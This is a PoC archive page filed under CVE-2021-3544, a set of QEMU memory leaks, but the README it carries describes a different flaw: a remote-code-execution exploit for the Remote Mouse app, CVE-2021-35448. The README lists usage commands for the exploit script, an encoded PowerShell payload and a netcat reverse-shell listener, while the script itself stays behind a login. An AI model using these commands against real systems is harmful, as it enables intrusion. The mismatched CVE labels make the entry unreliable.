Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2021-3544 PoC — QEMU 安全漏洞

Source
Associated Vulnerability
Title: QEMU 安全漏洞 (CVE-2021-3544)
Description:Several memory leaks were found in the virtio vhost-user GPU device (vhost-user-gpu) of QEMU in versions up to and including 6.0. They exist in contrib/vhost-user-gpu/vhost-user-gpu.c and contrib/vhost-user-gpu/virgl.c due to improper release of memory (i.e., free) after effective lifetime.
Description
POC for CVE-2021-3544 based on https://www.exploit-db.com/exploits/49601
Readme
# CVE-2021-35448 - Remote Mouse Exploit

## Description

This exploit targets the **CVE-2021-35448** vulnerability in the Remote Mouse application (formerly WiFi Mouse). 

# POC
[CVE-2021-35448.webm](https://github.com/user-attachments/assets/2aa1ff4a-31c0-46e2-9abb-8bfb17bede61)

## Usage

### Basic Syntax

```bash
python3 CVE-2021-35448.py -t <TARGET_IP> [OPTIONS]
```

### Options

- `-t, --target`: Target IP address (required)
- `-p, --payload`: Custom command to execute
- `-r, --reverse`: Reverse shell in IP:PORT format
- `-l, --http`: Local HTTP server in IP:PORT format (required with -r)

### Usage Examples

#### 1. Custom Command

```bash
python3 CVE-2021-35448.py -t 192.168.1.100 -p "Powershell -e JAB...=="
```

#### 2. Reverse Shell (Recommended)

```bash
# Terminal 1 - Listener
nc -nlvp 4444

# Terminal 2 - Exploit
python3 CVE-2021-35448.py -t $REMOTESERVER_IP -r $REVSHELL_IP:$PORT -l 0.0.0.0:$PORT
```

## Prerequisites

### Required Files

- `CVE-2021-35448.py`: Main exploitation script
- `powercat.ps1`: PowerShell script for reverse shells

### Target System

- Remote Mouse installed and running
- Windows system (tested on Windows 10)

## Warning

⚠️ **ETHICAL USE ONLY** ⚠️

This tool is intended for educational purposes and authorized penetration testing only. Unauthorized use of this exploit is illegal and may result in legal prosecution.

## References


- [WiFi Mouse 1.7.8.5 - Remote Code Execution](https://www.exploit-db.com/exploits/49601)
- [CVE-2021-35448 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-35448)


## Author

Developed for educational and ethical penetration testing purposes.

---

*Last updated: 2025*
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →